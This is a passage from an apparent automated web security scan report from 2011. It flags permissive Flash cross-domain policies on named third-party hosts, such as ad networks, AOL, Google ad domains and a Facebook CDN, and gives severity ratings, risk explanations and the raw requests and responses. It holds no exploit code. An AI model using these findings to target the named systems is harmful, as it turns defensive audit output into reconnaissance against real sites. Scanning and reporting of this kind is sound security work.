...[SNIP]...

6.14. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 02 Apr 2011 20:36:18 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.15. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 26 Mar 2011 20:36:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.16. http://wsjrs2.s3.amazonaws.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsjrs2.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: wsjrs2.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/490793/1-wsj_110047_liberal_300x250_concept2_v7.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: /ygg2oiBHlK6v15qwV3Mlh9lLjFKvnbFUZOKSUEaSxZznqachH6OCbBqhJFiloe2
x-amz-request-id: 76651971862BC367
Date: Sat, 26 Mar 2011 20:36:25 GMT
Last-Modified: Tue, 30 Mar 2010 18:47:15 GMT
ETag: "0bac47246d36616ecd0dddf332b7b352"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 213
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*"/></cross-do
...[SNIP]...

6.17. http://www.econda-monitor.de/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.econda-monitor.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.econda-monitor.de

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"214-1265030770000"
Last-Modified: Mon, 01 Feb 2010 13:26:10 GMT
Content-Type: application/xml
Content-Length: 214
Date: Fri, 25 Mar 2011 20:43:40 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-d
...[SNIP]...

6.18. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 26 Mar 2011 20:36:01 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

6.19. http://ads.tw.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.tw.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:16 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=980
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.20. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 26 Mar 2011 16:58:17 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sat, 26 Mar 2011 16:58:53 +0000 GMT
Etag: fe9f3be2d9532deeab27f58209bf7be5
X-Served-By: h03

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

6.21. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 25 Mar 2011 11:46:53 GMT
Expires: Sat, 26 Mar 2011 11:46:53 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26498
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.22. http://js.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Sat, 26 Mar 2011 21:06:16 GMT
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.23. http://music.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:21 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.24. http://my.screenname.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:19 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 23:57:10 GMT
ETag: "3f1-49eb66b672180"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=440
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...

6.25. http://o.aolcdn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=683105
Expires: Sun, 03 Apr 2011 18:21:22 GMT
Date: Sat, 26 Mar 2011 20:36:17 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...

6.26. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 25 Mar 2011 11:49:02 GMT
Expires: Sat, 26 Mar 2011 11:49:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26769
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.27. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.30.145.195
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:08 GMT
Content-Length: 1581
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
